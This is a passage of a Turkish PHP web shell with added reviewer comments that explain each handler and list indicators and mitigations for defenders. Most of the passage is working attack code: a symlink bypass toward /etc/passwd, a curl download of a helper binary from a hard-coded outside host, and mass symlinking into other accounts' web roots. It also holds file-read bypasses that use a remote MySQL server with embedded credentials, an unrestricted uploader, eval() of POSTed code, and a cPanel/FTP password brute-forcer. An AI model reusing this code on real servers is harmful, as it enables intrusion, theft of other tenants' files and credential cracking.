        // Symlink-swap sequence: builds a nested abc/ directory tree, creates a symlink 'tmplink'
        // into it, creates a second symlink 'exploit' whose target path walks through 'tmplink'
        // towards etc/passwd, then deletes 'tmplink' and recreates it as a real directory.
        // NOTE(review): this looks like an attempt to get a path accepted by a directory
        // restriction at link-creation time and have it resolve elsewhere afterwards -- confirm
        // against the PHP version in use; none of the calls is checked for failure.
        // Indicators: symlinks created by the web-server user; entries named abc, tmplink and
        // exploit in a web directory.
        // Mitigation: add symlink() to disable_functions, serve with SymLinksIfOwnerMatch instead
        // of FollowSymLinks, keep PHP patched.
  1747. mkdir('abc');
  1748. chdir('abc');
  1749. mkdir('etc');
  1750. chdir('etc');
  1751. mkdir('passwd');
  1752. chdir('..');
  1753. mkdir('abc');
  1754. chdir('abc');
  1755. mkdir('abc');
  1756. chdir('abc');
  1757. mkdir('abc');
  1758. chdir('abc');
        // Four levels back up: returns to the directory the handler started in.
  1759. chdir('..');
  1760. chdir('..');
  1761. chdir('..');
  1762. chdir('..');
  1763. symlink('abc/abc/abc/abc','tmplink');
  1764. symlink('tmplink/../../../etc/passwd','exploit');
  1765. unlink('tmplink');
  1766. mkdir('tmplink');
  1767. echo 'Tmplink oluþturuldu <a href=tmplink>tmplink</a> - <a href=abc>abc</a>';
  1768. }
  1769. if ($_GET[id]=='php44'){
        // Interpreter downgrade: overwrites .htaccess so every *.php file in this directory is
        // forced to the application/x-httpd-php4 handler, then stops the request.
        // The inner test can never be true (id is already known to equal 'php44'), so the ELSE
        // branch always runs; $action is assigned but never used; the .htaccess handle is never closed.
        // Indicators: .htaccess with a <Files *.php> ForceType block written by the web-server user.
        // Mitigation: AllowOverride without FileInfo; do not keep legacy PHP handlers registered.
  1770. if ($_GET[id]=='php4'){
  1771. }ELSE{
  1772. $action = '?a=php4';
  1773. echo "<html>
  1774. <br>
  1775. <head>
  1776. <meta http-equiv='pragma' content='no-cache'>
  1777. </head><body>";
  1778. $r1s = fopen('.htaccess','w+');
  1779. fwrite($r1s,'<Files *.php>
  1780.   ForceType application/x-httpd-php4
  1781. </Files>');
  1782. echo '<b>sistem þuanda PHP4</b><br>';
  1783. exit;
  1784. }
  1785. }
  1786. if ($_GET[id]=='perm'){
        // Cross-account exposure on shared hosting. Steps visible below:
        //   1. create and enter a directory 'anjiyo';
        //   2. download ln.zip from a hard-coded URL with curl, unzip it, chmod the extracted 'ln';
        //   3. write an .htaccess that enables Indexes/FollowSymLinks and maps .php to a plain-text
        //      type/handler, so linked PHP sources are shown rather than executed;
        //   4. read /etc/passwd (file(), falling back to popen of /bin/cat);
        //   5. for every account name, run ./ln -s /home/<name>/public_html <name>.
        // The first two progress messages are printed unconditionally; only the .htaccess write
        // and the passwd read are actually checked.
        // Indicators: directory 'anjiyo' full of per-user symlinks; curl/unzip/chmod spawned by the
        // PHP user; outbound HTTP to the host named below.
        // Mitigation: per-account filesystem isolation, home directories not traversable by other
        // users, SymLinksIfOwnerMatch, exec/popen in disable_functions, egress filtering.
  1787. @mkdir('anjiyo');
  1788. @chdir('anjiyo');
  1789. @exec('curl http://kordonfilm.com/priv/ln.zip -o ln.zip');
  1790. @exec('unzip ln.zip');
  1791. @exec('chmod 755 ln');
  1792. echo '<font color=green>[+] Dizin [ anjiyo ] adýyla oluþturuldu .</font><Br>';
  1793. echo '<font color=green>[+] Dizin deðiþtirildi .</font><Br>';
  1794. $file3 = 'Options Indexes FollowSymLinks
  1795. DirectoryIndex ssssss.htm
  1796. AddType txt .php
  1797. AddHandler txt .php';
  1798. $fp3 = fopen('.htaccess','w');
  1799. $fw3 = fwrite($fp3,$file3);
  1800. if ($fw3) {
  1801. echo '<font color=green>[+] .htaccess yüklendi .</font><BR>';
  1802. }
  1803. else {
  1804. echo '<font color=red>[+] Permission izin vermiyor .htaccess oluþturulamadý !</font><BR>';
  1805. }
  1806. @fclose($fp3);
  1807. $lines3=@file('/etc/passwd');
  1808. if (!$lines3) {
        // Fallback when file() is blocked: read the same file through a child process.
  1809. $authp = @popen('/bin/cat /etc/passwd','r');
  1810. $i = 0;
  1811. while (!feof($authp))
  1812. $aSonuç[$i++] = fgets($authp,4096);
  1813. $lines3 = $aSonuç;
  1814. @pclose($authp);
  1815. }
  1816. if (!$lines3) {
  1817. echo "<font color=red>[+] Can't Read /etc/passwd File .</font><BR>";
  1818. echo "<font color=red>[+] Can't Make The Users Shortcuts .</font><BR>";
  1819. echo '<font color=red>[+] Finish !</font><BR>';
  1820. }
  1821. else {
  1822. foreach($lines3 as $line_num3=>$line3){
  1823. $sprt3=explode(':',$line3);
  1824. $user3=$sprt3[0];
        // The account name goes into the shell command without escaping; the exec() result is
        // ignored, so the success messages below do not prove any link was created.
  1825. @exec('./ln -s /home/'.$user3.'/public_html '.$user3);
  1826. }
  1827. echo '<font color=green>[+] Users Shortcut Created .</font><BR>';
  1828. echo '<font color=green>[+] Finish !</font><BR>';
  1829. }
  1830. }
  1831. if ($_GET[id]=='namedbypass'){
        // Tries one read primitive after another against /etc/named.conf and prints the first
        // result it gets: backtick, system(), shell_exec(), readfile(), file_get_contents(),
        // copy() through the compress.zlib wrapper, cURL with a file:// URL, posix_* lookups,
        // MySQL LOAD DATA LOCAL INFILE via a hard-coded remote server, and the perl, ionCube and
        // python extensions.
        // Why named.conf: it lists the DNS zones served by the host, i.e. the co-hosted domains
        // (the id=symlist handler in this file parses the same file for that purpose).
        // Indicators: the hard-coded database host and account below (search egress and DB logs);
        // `cat /etc/named.conf` or `ls` spawned by the PHP user; file.txt appearing next to the script.
        // Mitigation: named.conf readable only by root and the DNS service account, open_basedir,
        // process and posix functions in disable_functions, local_infile disabled on MySQL client
        // and server, cURL restricted to http/https, egress filtering for the web tier.
        // Compatibility facts useful for triage: create_function() was removed in PHP 8.0 and the
        // mysql_* API in PHP 7.0, so this handler stops with a fatal error at line 1838 on PHP 8
        // and, on PHP 7, at the MySQL step if no earlier method has succeeded.
  1832. $conf['groups'] = 1;
  1833. $conf['accounts'] = array();
  1834. $MySQL['host'] = '94.73.146.248';
  1835. $MySQL['user'] = 'cihaz';
  1836. $MySQL['pass'] = '00235154';
  1837. $MySQL['db'] = 'paketleme';
        // The lambda body below echoes progress and may call dl(), but has no return statement,
        // so every `$IsCallableExt(...)` test further down evaluates to null.
  1838. $IsCallableExt = create_function('$ext','
  1839. // function IsCallableExt($ext)
  1840. // {
  1841.     echo "Deneniyor via {$ext} extension...";
  1842.  
  1843.     // Check whether this extension can be used
  1844.     if ( @extension_loaded($ext) )
  1845.     {
  1846.         echo "extension loaded, Deneniyor...";
  1847.         $ext = 1; // YAY, it has already been enabled!
  1848.     }
  1849.     else
  1850.     {
  1851.         echo "extension is off. Deneniyor to load {$ext} extension...";
  1852.  
  1853.         // We must try to enable it!
  1854.         if ( is_callable("dl") )
  1855.         {
  1856.             @dl((PHP_SHLIB_SUFFIX === "dll" ? "php_" : "").$ext.".".PHP_SHLIB_SUFFIX);
  1857.         }
  1858.  
  1859.         // Check whether it worked
  1860.         if ( @extension_loaded("posix") )
  1861.         {
  1862.             $ext = 1; // YAY, it worked!
  1863.         }
  1864.     }
  1865. // }
  1866. ');
        // Runtime attempts to lift restrictions; errors are suppressed and the results are not checked.
  1867. @ini_restore('safe_mode');@ini_set('safe_mode',0);
  1868. @ini_restore('open_basedir');@ini_set('open_basedir','');
  1869. @ini_restore('disable_functions');@ini_set('disable_functions','');
        // $conf['safe_mode'] is only filled in when error_reporting is non-zero; otherwise it
        // stays unset and is reported as 'off'.
  1870. if ( is_callable('ini_get') &&ini_get('error_reporting') )
  1871. {
  1872. $conf['safe_mode'] = ini_get('safe_mode');
  1873. }
  1874. echo 'Safe-Mode is '.($conf['safe_mode'] ?'on': 'off')."<br />
  1875. ";
  1876. echo 'Deneniyor via backtick operator...';
  1877. if ( !$conf['safe_mode'] )
  1878. {
  1879. $passwd = `cat /etc/named.conf`;
  1880. if ( $passwd )
  1881. {
  1882. die("DONE!<br /><br /><br /><br />
  1883. ".nl2br($passwd));
  1884. }
  1885. }
  1886. echo "failed.<br />
  1887. Deneniyor via system()...";$x = '';
  1888. if ( @system('ls',$x) )
  1889. {
        // The second argument of system() receives the exit status, not the output, so $passwd
        // holds a status code here; the file content, if any, was already echoed by system().
  1890. system('cat /etc/named.conf',$passwd);
  1891. if ( $passwd )
  1892. {
  1893. die("DONE!<br /><br /><br /><br />
  1894. ".nl2br($passwd));
  1895. }
  1896. }
  1897. echo "failed.<br />
  1898. Deneniyor via shell_exec()...";
  1899. if ( @shell_exec('ls') )
  1900. {
  1901. $passwd = shell_exec('cat /etc/named.conf');
  1902. if ( $passwd )
  1903. {
  1904. die("DONE!<br /><br /><br /><br />
  1905. ".nl2br($passwd));
  1906. }
  1907. }
  1908. echo "failed.<br />
  1909. Deneniyor via readfile()...";
  1910. if ( @readfile('/etc/named.conf') )
  1911. {
  1912. die();
  1913. }
  1914. echo "failed.<br />
  1915. Deneniyor via file_get_contents()...";
  1916. if ( @is_readable('/etc/named.conf') )
  1917. {
  1918. $passwd = file_get_contents('/etc/named.conf');
  1919. if ( $passwd )
  1920. {
  1921. die("DONE!<br /><br /><br /><br />
  1922. ".nl2br($passwd));
  1923. }
  1924. }
  1925. echo "failed.<br />
  1926. Deneniyor via copy()...";
  1927. if ( is_callable('copy') )
  1928. {
        // Stream-wrapper read: on success a copy named file.txt is left beside the script.
        // Execution does not stop here, so "failed." is printed afterwards either way.
  1929. if ( @copy('compress.zlib:///etc/named.conf',dirname($_SERVER['SCRIPT_FILENAME']).'/file.txt') )
  1930. {
  1931. echo 'go to: '.dirname($_SERVER['SCRIPT_FILENAME']).'/file.txt';
  1932. }
  1933. }
  1934. echo "failed.<br />
  1935. Deneniyor via CURL...";
  1936. if ( is_callable('curl_init') &&is_callable('curl_exec') )
  1937. {
        // Local-file read through libcurl's file scheme; the URL string as written carries a
        // trailing " index.php".
  1938. $passwd = curl_init("file:///etc/named.conf ".'index.php');
  1939. if ( curl_exec($passwd) )
  1940. {
  1941. var_dump(curl_exec($passwd));die();
  1942. }
  1943. }
  1944. echo "failed.<br />
  1945. ";
  1946. if ( $IsCallableExt('posix') )
  1947. {
  1948. echo "done.<br />
  1949. Deneniyor via posix_getpwuid()...";
  1950. if ( is_callable('posix_getpwuid') )
  1951. {
  1952. $passwd = array();
        // Walks UIDs 0-4999 to rebuild the account list without opening /etc/passwd.
  1953. for ( $i=0;$i<5000;$i++)
  1954. {
  1955. $line = @posix_getpwuid($i);
  1956. if ( $line )
  1957. {
  1958. $passwd[$i] = $line;
  1959. }
  1960. }
  1961. if ( count($passwd) )
  1962. {
  1963. die(implode("<br />
  1964. ",$passwd));
  1965. }
  1966. }
  1967. echo "failed.<br />
  1968. Deneniyor via posix_getgrgid()...";
  1969. if ( $conf['groups'] &&is_callable('posix_getgrgid') )
  1970. {
  1971. $passwd = array();
  1972. for ( $i=0;$i<5000;$i++)
  1973. {
  1974. $line = @posix_getgrgid($i);
  1975. if ( $line )
  1976. {
  1977. $passwd[$i] = $line;
  1978. }
  1979. }
  1980. if ( count($passwd) )
  1981. {
  1982. die(implode("<br />
  1983. ",$passwd));
  1984. }
  1985. }
  1986. echo "failed.<br />
  1987. Deneniyor via posix_getpwnam()...";
  1988. if ( is_callable('posix_getpwnam') )
  1989. {
  1990. $passwd = array();
        // $conf['accounts'] is the empty array set at line 1833, so this loop and the
        // posix_getgrnam() one below have nothing to iterate.
  1991. foreach ( $conf['accounts'] as $account )
  1992. {
  1993. $passwd[$account] = posix_getpwnam($account);
  1994. }
  1995. if ( count($passwd) )
  1996. {
  1997. die(implode("<br />
  1998. ",$passwd));
  1999. }
  2000. }
  2001. echo "failed.<br />
  2002. Deneniyor via posix_getgrnam()...";
  2003. if ( $conf['groups'] &&is_callable('posix_getgrnam') )
  2004. {
  2005. $passwd = array();
  2006. foreach ( $conf['accounts'] as $account )
  2007. {
  2008. $passwd[$account] = posix_getgrnam($account);
  2009. }
  2010. if ( count($passwd) )
  2011. {
  2012. die(implode("<br />
  2013. ",$passwd));
  2014. }
  2015. }
  2016. }
  2017. echo "failed.<br />
  2018. ";
  2019. echo 'Deneniyor via MySQL (LOCAL-INFILE)...';
  2020. if ( $MySQL['host'] &&$MySQL['user'] &&$MySQL['pass'] &&$MySQL['db'] )
  2021. {
        // Connects out to the hard-coded server and asks the client library to upload the local
        // file into a scratch table (adskfjlsdjf), then reads it back. No call is checked, and the
        // table is never dropped. Outbound MySQL traffic from a web server to an unknown address
        // is the network indicator.
  2022. mysql_connect($MySQL['host'],$MySQL['user'],$MySQL['pass']);
  2023. mysql_select_db($MySQL['db']);
  2024. mysql_query('CREATE TABLE adskfjlsdjf (a varchar(1024))');
  2025. mysql_query("LOAD DATA LOCAL INFILE '/etc/named.conf' INTO TABLE adskfjlsdjf");
  2026. $Query = mysql_query('SELECT a FROM adskfjlsdjf');
  2027. if ( mysql_num_rows($Query) )
  2028. {
  2029. while ( $Row = mysql_fetch_row($Query) )
  2030. {
  2031. echo implode('',$Row)."
  2032. <br />";
  2033. }
  2034. die();
  2035. }
  2036. }
  2037. echo "failed.<br />
  2038. ";
  2039. if ( $IsCallableExt('perl') )
  2040. {
  2041. $perl = new perl();
  2042. die($perl->eval("system('cat /etc/named.conf')"));
  2043. }
  2044. echo "failed.<br />
  2045. ";
  2046. if ( $IsCallableExt('ionCube Loader') )
  2047. {
  2048. $passwd = @ioncube_read_file('/etc/named.conf');
  2049. if ( $passwd )
  2050. {
  2051. die(nl2br($passwd));
  2052. }
  2053. }
  2054. echo "failed.<br />
  2055. ";
  2056. if ( $IsCallableExt('python') )
  2057. {
  2058. $passwd = python_eval("
  2059. import os
  2060. pwd = os.getcwd()
  2061. print pwd
  2062. os.system('cat /etc/named.conf')
  2063. ");
  2064. if ( $passwd )
  2065. {
  2066. die(nl2br($passwd));
  2067. }
  2068. }
  2069. echo "failed.<br />
  2070. ";
  2071. echo '<br /><br />
  2072. Unable to read /etc/named.conf, nothing worked.<br />';
  2073. }
  2074. if ($_GET[id]=='passwd1'){
        // Account enumeration without touching /etc/passwd: asks the system account database for
        // UIDs 0-1999 and prints every field of each hit, colon-separated.
        // each() was removed in PHP 8.0, so this loop is a fatal error there.
        // Mitigation: add the posix_* functions to disable_functions on shared hosting.
  2075. for($uid=0;$uid<2000;$uid++){
  2076. $nothing = posix_getpwuid($uid);
  2077. if (!empty($nothing)) {
  2078. while (list ($key,$val) = each($nothing)){
  2079. print "$val:";
  2080. }
  2081. print '<br />';
  2082. }
  2083. }
  2084. }
  2085. if ($_GET[id]=='yukle'){
        // Unrestricted upload: renders a file form and, on submit, copies the uploaded temp file
        // into the current directory under the client-supplied name. There is no extension, type
        // or path check, and copy() is used instead of move_uploaded_file().
        // Indicators: multipart POSTs to this script with a field named _upl; new files owned by
        // the web-server user next to it.
        // Mitigation: non-writable document root; no PHP handler in any upload directory.
  2086. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  2087. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  2088. if( $_POST['_upl'] == 'Upload') {
  2089. if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])) {echo '<b>Yükleme baþarýlý !!!</b><br><br>';}
  2090. else {echo '<b>Yükleme baþarýsýz !!!</b><br><br>';}
  2091. }
        // The button links to ?a=phpini, while the php.ini handler in this file tests id=phpini;
        // whether an `a` parameter is mapped to `id` elsewhere is not visible here.
  2092. echo '<a href=?a=phpini><input type="submit" value="Güvenlikleri kapat"></a>';
  2093. }
  2094. if ($_GET[id]=='pg'){
        // Bulk PageRank lookup: takes a newline-separated list of sites from POST 'site', computes
        // a checksum for each and queries toolbarqueries.google.com, streaming results as it goes.
        // This is reconnaissance tooling rather than a host-compromise primitive; its footprint is
        // outbound HTTP from the PHP worker to that Google endpoint.
        // The helper functions are declared inside this conditional, so they exist only once the
        // branch has run.
  2095. echo "<form method=\"post\" action=\"\">";
  2096. echo "<textarea name=\"site\" cols=\"60\" rows=\"10\"></textarea><br /><input type=\"submit\" value=\"sorgula\">";
  2097. echo '<br>';
  2098. ob_start();
        // Rolling hash over the bytes of $Str: multiply by $Magic, reduce once the value reaches
        // 2^32, add the byte value. `$Str{$i}` offset syntax was removed in PHP 8.0.
  2099. function StrToNum($Str,$Check,$Magic)
  2100. {
  2101. $Int32Unit = 4294967296;
  2102. $length = strlen($Str);
  2103. for ($i = 0;$i <$length;$i++) {
  2104. $Check *= $Magic;
  2105. if ($Check >= $Int32Unit) {
  2106. $Check = ($Check -$Int32Unit * (int) ($Check / $Int32Unit));
  2107. $Check = ($Check <-2147483648) ?($Check +$Int32Unit) : $Check;
  2108. }
  2109. $Check += ord($Str{$i});
  2110. }
  2111. return $Check;
  2112. }
        // Combines two StrToNum passes (different seeds and multipliers) through fixed shifts
        // and masks into a single integer.
  2113. function HashURL($String)
  2114. {
  2115. $Check1 = StrToNum($String,0x1505,0x21);
  2116. $Check2 = StrToNum($String,0,0x1003F);
  2117. $Check1 >>= 2;
  2118. $Check1 = (($Check1 >>4) &0x3FFFFC0 ) |($Check1 &0x3F);
  2119. $Check1 = (($Check1 >>4) &0x3FFC00 ) |($Check1 &0x3FF);
  2120. $Check1 = (($Check1 >>4) &0x3C000 ) |($Check1 &0x3FFF);
  2121. $T1 = (((($Check1 &0x3C0) <<4) |($Check1 &0x3C)) <<2 ) |($Check2 &0xF0F );
  2122. $T2 = (((($Check1 &0xFFFFC000) <<4) |($Check1 &0x3C00)) <<0xA) |($Check2 &0xF0F0000 );
  2123. return ($T1 |$T2);
  2124. }
        // Formats the hash as an unsigned decimal string, derives one check digit from its digits
        // (every second digit from the right is doubled and its digits summed), and returns
        // '7' . check digit . decimal hash.
  2125. function CheckHash($Hashnum)
  2126. {
  2127. $CheckByte = 0;
  2128. $Flag = 0;
  2129. $HashStr = sprintf('%u',$Hashnum) ;
  2130. $length = strlen($HashStr);
  2131. for ($i = $length -1;$i >= 0;$i --) {
  2132. $Re = $HashStr{$i};
  2133. if (1 === ($Flag %2)) {
  2134. $Re += $Re;
  2135. $Re = (int)($Re / 10) +($Re %10);
  2136. }
  2137. $CheckByte += $Re;
  2138. $Flag ++;
  2139. }
  2140. $CheckByte %= 10;
  2141. if (0 !== $CheckByte) {
  2142. $CheckByte = 10 -$CheckByte;
  2143. if (1 === ($Flag %2) ) {
  2144. if (1 === ($CheckByte %2)) {
  2145. $CheckByte += 9;
  2146. }
  2147. $CheckByte >>= 1;
  2148. }
  2149. }
  2150. return '7'.$CheckByte.$HashStr;
  2151. }
        // Builds the query URL and returns the text that follows the 'Rank_' marker in the reply;
        // returns nothing (null) when the marker is absent. $url goes into the query string
        // without URL-encoding.
  2152. function getpagerank($url) {
  2153. $query='http://toolbarqueries.google.com/tbr?client=navclient-auto&hl=en&ch='.CheckHash(HashURL($url)).'&features=Rank&q=info:'.$url.'&num=100&filter=0';
  2154. $data=file_get_contents_curl($query);
  2155. $pos = strpos($data,'Rank_');
  2156. if($pos === false){}else{
  2157. $pagerank = substr($data,$pos +9);
  2158. return $pagerank;
  2159. }
  2160. }
        // Plain cURL GET returning the body as a string; no timeout and no error handling.
  2161. function file_get_contents_curl($url) {
  2162. $ch = curl_init();
  2163. curl_setopt($ch,CURLOPT_HEADER,0);
  2164. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2165. curl_setopt($ch,CURLOPT_URL,$url);
  2166. $data = curl_exec($ch);
  2167. curl_close($ch);
  2168. return $data;
  2169. }
  2170. if(!$_POST['site']==''){
  2171. $site = explode("
  2172. ",$_POST['site']);
  2173. foreach($site as $sites){
  2174. $sites = trim($sites);
        // Called as getPageRank; PHP function names are case-insensitive, so this resolves to
        // getpagerank() above. The submitted value is echoed back without HTML escaping.
  2175. $pr = getPageRank($sites);
  2176. echo $sites.' => <b>'.$pr.'</b><br />';
  2177. ob_flush();
  2178. flush();
  2179. }
  2180. }
  2181. }
  2182. if ($_GET[id]=='eval'){
        // Arbitrary code execution: POST 'code' is passed, after stripslashes(), straight to eval().
        // The same value is echoed into the form without escaping, followed by a canned snippet
        // that the author ships as default text (it is only displayed, not run, unless resubmitted).
        // eval is a language construct, so disable_functions does not affect it.
        // Indicators: POST bodies with a `code` field to a PHP file that is not part of the
        // application; static-scan hit on eval() fed from $_POST.
        // Mitigation: file-integrity monitoring and a non-writable document root so the script
        // cannot be planted; WAF rules on PHP source in request bodies.
  2183. $code=stripslashes($_POST['code']);
  2184. echo '<center><br><h3> Eval PHP(aslýnda en etkili bypass methodlarýndan birisidir) </h3></center>
  2185.     <center>
  2186.     <form method="POST" action="">
  2187.     <input type="hidden" name="id" value="eval">
  2188.     <textarea name ="code" rows="10" cols="85" class="textarea">',$code,'
  2189. chdir("file:");
  2190. chdir("etc");
  2191. chdir("..");
  2192. chdir("..");
  2193.  
  2194. $ch = curl_init();
  2195.  
  2196. curl_setopt($ch, CURLOPT_URL, "file:file:///etc/passwd");
  2197. curl_setopt($ch, CURLOPT_HEADER, 0);
  2198.  
  2199. curl_exec($ch);
  2200.  
  2201. curl_close($ch);</textarea><br><br>
  2202.     <input type="submit" value=" Evaluate PHP Code" class="button"><hr>
  2203.     </form>
  2204.     <textarea rows="10" cols="85" class="textarea">';
  2205. eval($code);
  2206. echo '</textarea><br><br>';
  2207. }
  2208. if ($_GET[id]=='symlist'){
        // Shared-hosting cross-account browser. It creates a world-writable sym/ directory, drops
        // an .htaccess there that serves .php and .html as plain text and relaxes access control,
        // symlinks the filesystem root to sym/root, then parses /etc/named.conf for zone names and
        // prints one row per domain with a link into that account's public_html through the symlink.
        // Indicators: a sym/ directory containing a 'root' symlink to /; .htaccess with
        // "AddType text/plain .php"; web requests under /sym/root/home/.
        // Mitigation: symlink() in disable_functions, SymLinksIfOwnerMatch, AllowOverride limited so
        // handlers/types cannot be remapped, named.conf not readable by the web user, per-account
        // filesystem isolation.
  2209. $mk = @mkdir('sym',0777);
  2210. $htcs  = "Options all
  2211. DirectoryIndex Sux.html
  2212. AddType text/plain .php
  2213. AddHandler server-parsed .php
  2214.  AddType text/plain .html
  2215. AddHandler txt .html
  2216. Require None
  2217. Satisfy Any";
        // The .htaccess handle is never closed; every call here is error-suppressed and unchecked.
  2218. $f =@fopen ('sym/.htaccess','w');
  2219. @fwrite($f ,$htcs);
  2220. $sym = @symlink('/','sym/root');
  2221. $pg = basename('index.php');
  2222. $d00m = @file('/etc/named.conf');
  2223. if(!$d00m)
  2224. {
  2225. die (' <br><br><center><b>named.conf</b> Dosyasý okunamýyor Manuel symlink deneyiniz</center>');
  2226. }
  2227. else
  2228. {
  2229. echo "<div class='tmp'><table align='center' width='40%'><td>Domainler</td><td>Users</td><td>symlink </td>";
  2230. foreach($d00m as $dom){
        // eregi() was removed in PHP 7.0, so on current PHP the listing stops here with a fatal error.
  2231. if(eregi('zone',$dom)){
  2232. preg_match_all('#zone "(.*)"#',$dom,$domsws);
  2233. flush();
  2234. if(strlen(trim($domsws[1][0])) >2){
        // Maps a domain to its owning account through the owner of /etc/valiases/<domain>
        // (presumably the cPanel per-domain alias file -- confirm on the affected host).
  2235. $user = posix_getpwuid(@fileowner('/etc/valiases/'.$domsws[1][0]));
  2236. $site = $user['name'] ;
  2237. @symlink('/','sym/root');
  2238. $site = $domsws[1][0];
  2239. $ir = 'ir';
  2240. $il = 'il';
        // NOTE(review): '^' placed after '.' cannot match in these patterns, so the red highlight
        // for these two suffixes looks like it never triggers.
  2241. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
  2242. {
  2243. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0].'</div>';
  2244. }
  2245. echo "
  2246. <tr>
  2247.  
  2248. <td>
  2249. <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0].'/>'.$site.' </a> </div>
  2250. </td>
  2251.  
  2252.  
  2253. <td>
  2254. '.$user['name']."
  2255. </td>
  2256.  
  2257.  
  2258. <td>
  2259. <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
  2260. </td>
  2261.  
  2262.  
  2263. </tr></div> ";
  2264. flush();
  2265. }
  2266. }
  2267. }
  2268. }
  2269. }
  2270. else
  2271. {
        // This branch runs on EVERY request whose id is not 'symlist': if POST 'symlink' is set it
        // links the caller-supplied path (POST 'file') to sym/<POST 'symfile'> and exits. Both
        // values are used unvalidated and $symfile is echoed unescaped.
  2272. $pfile = $_POST['file'];
  2273. $symfile = $_POST['symfile'];
  2274. $symlink = $_POST['symlink'];
  2275. if ($symlink)
  2276. {
  2277. @symlink("$pfile","sym/$symfile");
  2278. echo '<br /><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a>';
  2279. exit;
  2280. }
  2281. }
  2282. if ($_GET[id]=='manuelsym'){
        // Manual variant of the symlink reader: a form that takes an absolute path and a link name,
        // then creates sym/<link name> pointing at that path so the file can be fetched over HTTP.
        // The prefilled defaults show the intended target: another account's config.php.
        // Neither POST value is validated, and $symfile is echoed back unescaped.
        // Indicators: symlinks under sym/ pointing into other users' home directories.
        // Mitigation: symlink() in disable_functions, SymLinksIfOwnerMatch, configuration files
        // readable only by their owner.
  2283. echo '
  2284. Manuel Symlink bölümü
  2285.  
  2286. <br /><br />
  2287. <form method="post">
  2288. <input type="text" name="file" value="/home/user/public_html/config.php" size="60"/><br /><br />
  2289. <input type="text" name="symfile" value="siyanur5x.txt" size="60"/><br /><br />
  2290. <input type="submit" value="symlink çek" name="symlink" /> <br /><br />
  2291.  
  2292.  
  2293.  
  2294. </form>
  2295. ';
  2296. $pfile = $_POST['file'];
  2297. $symfile = $_POST['symfile'];
  2298. $symlink = $_POST['symlink'];
  2299. if ($symlink)
  2300. {
  2301. @symlink("$pfile","sym/$symfile");
  2302. echo '<br /><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a>';
  2303. exit;
  2304. }
  2305. }
  2306. if ($_GET[id]=='cpanel'){
        // Credential-guessing tool: takes a user list and a password list from the request and
        // tries every pair against either FTP or the cPanel HTTP port (2082) of the chosen host,
        // which defaults to localhost. Time and memory limits are lifted first.
        // Because attempts originate from the web server itself, they arrive at the control panel
        // from a local address.
        // Indicators: bursts of failed logins on port 21 or 2082 sourced from the server's own IP
        // or 127.0.0.1; a long-running PHP worker.
        // Mitigation: login throttling and lockout that do NOT exempt local addresses, curl in
        // disable_functions for untrusted sites, egress filtering for the web tier.
  2307. @ini_set('memory_limit',1000000000000);
  2308. $connect_timeout=5;
  2309. @set_time_limit(0);
  2310. $submit = $_REQUEST['submit'];
  2311. $users = $_REQUEST['users'];
  2312. $pass = $_REQUEST['passwords'];
  2313. $target = $_REQUEST['target'];
  2314. $option = $_REQUEST['option'];
  2315. $page = $_GET['page'];
  2316. if($target == ''){
  2317. $target = 'localhost';
  2318. }
        // Lines 2319-2329 repeat the initialisation above verbatim (minus $page); $page is never read.
  2319. @ini_set('memory_limit',1000000000000);
  2320. $connect_timeout=5;
  2321. @set_time_limit(0);
  2322. $submit = $_REQUEST['submit'];
  2323. $users = $_REQUEST['users'];
  2324. $pass = $_REQUEST['passwords'];
  2325. $target = $_REQUEST['target'];
  2326. $option = $_REQUEST['option'];
  2327. if($target == ''){
  2328. $target = 'localhost';
  2329. }
        // $target, $users and $pass are interpolated into the HTML below without escaping.
  2330. print " <div align='center'>
  2331. <form method='post' style='border: 1px solid #000000'><br><br>
  2332. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0  cellPadding=0 width='40%' borderColorLight=#666666 border=0><tr><td>
  2333. <b> Host  : </font><input type='text' name='target' size='16' value= $target style='border: font-family:Tahoma; font-weight:bold;'></p></font></b></p>
  2334. <div align='center'><br>
  2335. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0  cellPadding=0 width='50%'  borderColorLight=#666666 border=0>
  2336. <tr>
  2337. <center>
  2338. <b>Kullanýcý adlarý</b></center>
  2339.  
  2340.  
  2341. </tr>
  2342. </table>
  2343. <p align='center'>
  2344. <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; '>$users</textarea>
  2345.  
  2346. <center><b>Þifre listesi</b></center>
  2347. <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D;'>$pass</textarea><br>
  2348. <br>                        
  2349. <b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
  2350. <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp    <input type='submit' value='Kýrmaya baþla' name='submit' ></p>
  2351. </td></tr></table></td></tr></form><p align= 'left'>";
        // One FTP login attempt through cURL. cURL error 28 (timeout) aborts the whole run with
        // exit; error 0 is reported as a hit and the guessed password is printed in clear text.
  2352. function ftp_check($host,$user,$pass,$timeout){
  2353. $ch = curl_init();
  2354. curl_setopt($ch,CURLOPT_URL,"ftp://$host");
  2355. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2356. curl_setopt($ch,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);
  2357. curl_setopt($ch,CURLOPT_FTPLISTONLY,1);
  2358. curl_setopt($ch,CURLOPT_USERPWD,"$user:$pass");
  2359. curl_setopt ($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
  2360. curl_setopt($ch,CURLOPT_FAILONERROR,1);
  2361. $data = curl_exec($ch);
  2362. if ( curl_errno($ch) == 28 ) {
  2363. print '<b> Hata : Süre dýþý kaldýn , tekrar dene !</b>';
  2364. exit;}
  2365. elseif ( curl_errno($ch) == 0 ){
  2366. print
  2367. "<b>[ user@aria-security.com ]# </b>
  2368. <b> Saldýrý baþarýlý , bulunan kullanýcý adý , <font color='#FF0000'> $user </font> ve Þifre ,
